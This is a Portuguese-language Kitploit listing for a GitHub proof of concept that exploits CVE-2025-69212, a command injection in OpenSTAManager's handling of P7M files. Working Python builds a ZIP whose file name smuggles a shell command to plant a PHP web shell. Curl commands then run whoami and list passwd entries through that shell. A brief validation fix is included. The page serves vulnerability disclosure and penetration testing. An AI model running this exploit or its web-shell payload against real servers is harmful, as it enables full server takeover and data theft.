Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OpenSTA-Exploit — Prova de Conceito (PoC) da CVE-2025-69212 relacionada com o processamento de arquivos P7M. | Kitploit
Ferramentas/GitHubGitHub/lolw0/opensta-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHublolw0/opensta-exploit

OpenSTA-Exploit

Prova de Conceito (PoC) da CVE-2025-69212 relacionada com o processamento de arquivos P7M.

Ver Repositório
há 5 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

OpenSTA-Exploit

imagem

DadosDetalhe
ID do CVECVE-2025-69212
Pontuação da vulnerabilidadecrítica (9.4)
CWE78: Neutralização incorreta de elementos especiais usados em um comando do SO
Versões afetadasOpenSTAManager <= 2.9.8
Vetor de ataquefazer upload de um arquivo ZIP contendo um arquivo .p7m com nome de arquivo malicioso
AutenticaçãoNecessária
Impactoexecutar comandos arbitrários do sistema no servidor

Explicação da exploração

  1. Armazena um comando shell na variável cmd (que cria um arquivo chamado SHELL.php contendo código PHP que pode executar comandos).
  2. Constrói um nome de arquivo especial escondendo o comando da variável cmd e o salva na variável malicious_file.
  3. Cria um novo arquivo ZIP chamado exploit.zip e o abre para escrita.
  4. Adiciona um arquivo ao ZIP. O nome do arquivo é a variável malicious_file.
  5. O nome de arquivo malicioso é injetado no comando exec().

PoC (Prova de Conceito)

1. Criar arquivo zip para injetar

root@kitploit:~
import zipfile
import time

print("Creating zip file...")
time.sleep(1)

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_file = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    zf.writestr(malicious_file, b"")

2. Executar o arquivo e fazer upload

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ python3 exploit.py
Creating zip file...
lolw0@sys:~/OpenSTA-Exploit$ ls
-rw-rw-r 2 lolw0 lolw0 281 Aug 10 22:36 exploit.zip
imagem

imagem

3. Resultado da exploração

O parsing de XML falha após a execução do comando

root@kitploit:~
HTTP/1.1 500 Internal Server Error

"error":{
"type":"Exception",
"message":"Start tag expected, '<' not found\n",
"code":0,
"file":"\/var\/www\/html\/openstamanager\/src\/Util\/XML.php",
"line":51}

3. Verificação e execução remota de código

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ curl "http://localhost:8080/files/SHELL.php?c=whoami"

www-data

lolw0@sys:~/OpenSTA-Exploit$ curl -s --get \ --data-urlencode 'c=getent passwd | grep -E "/home|/bin/bash|/bin/sh"' \
'http://localhost:8080/files/SHELL.php'

root:x:0:0:root:/root:/bin/bash
xxxx:x:1001:1001:,,,:/home/xxxx:/usr/sbin/nologin
yyyy:x:1002:1002:,,,:/home/yyyy:/usr/sbin/nologin
zzzz:x:1003:1003:,,,:/home/zzzz:/usr/sbin/nologin



Consequências


Correção

uma correção simples é validar os nomes de arquivo antes do processamento (permitir apenas caracteres alfanuméricos, pontos, traços e sublinhados para ignorar nomes de arquivo inválidos)

root@kitploit:~
foreach ($files_xml as $xml) {
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
        continue; 
    }
    if (string_ends_with($xml, '.p7m')) {
        $file = XML::decodeP7M($directory.'/'.$xml);
    }
}

(ou você pode simplesmente atualizar lol)

Baixar ferramenta
AtaqueDetalhe
Execução remota de códigoComprometimento total do servidor com execução de comandos
Exfiltração de dadosAcesso a todos os dados do aplicativo e ao banco de dados
Escalação de privilégiosEscalação potencial se o servidor web for executado com privilégios elevados ou estiver vulnerável
PersistênciaInstalar backdoors e manter o acesso ao longo do tempo
Movimentação lateralPivotar para outros sistemas/usuários na rede